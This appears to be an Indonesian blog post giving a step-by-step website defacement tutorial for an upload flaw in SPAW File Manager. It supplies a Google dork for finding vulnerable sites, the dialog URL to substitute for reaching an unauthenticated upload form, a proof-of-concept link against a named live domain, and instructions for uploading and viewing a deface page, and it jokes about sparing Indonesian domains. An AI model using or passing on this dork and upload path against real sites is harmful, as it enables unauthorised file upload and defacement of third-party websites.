Okelah, Langsung saja ni, lagi males ngecincong.
Vulnability kali ini terdapat pada form upload Spaw File Manager ,
Berikut dorknya :
inurl:/spaw2/uploads/files/ site:.net
Pada site bisa diganti dengan domain lainya, pliz jangan .id < kasian masi setanah coy :p
Klik salah satu target pada hasil pencarian, jika ada alert download file, di Close saja.
Sample :
http//target.net/[patch.a.b.c.d.]/spaw2/uploads/files/blablabla.pdf
Ganti teks link bewarna merah dengan kode berikut :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
POC :
http://komteltek.net/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Terlihat form upload disana, kemudian ganti format images menjadi files
Lanjut klik browse, dan klik upload.
Untuk melihat page deface, silahkan klik file yang tadi kita upload kemudian klik [download files] atau klik kanan > open new tab, selamat mencoba.
Gitu aja kok repot xD
0 komentar:
Posting Komentar
Terima Kasih Telah Berkunjung
Berkomentarlah Dengan Sopan !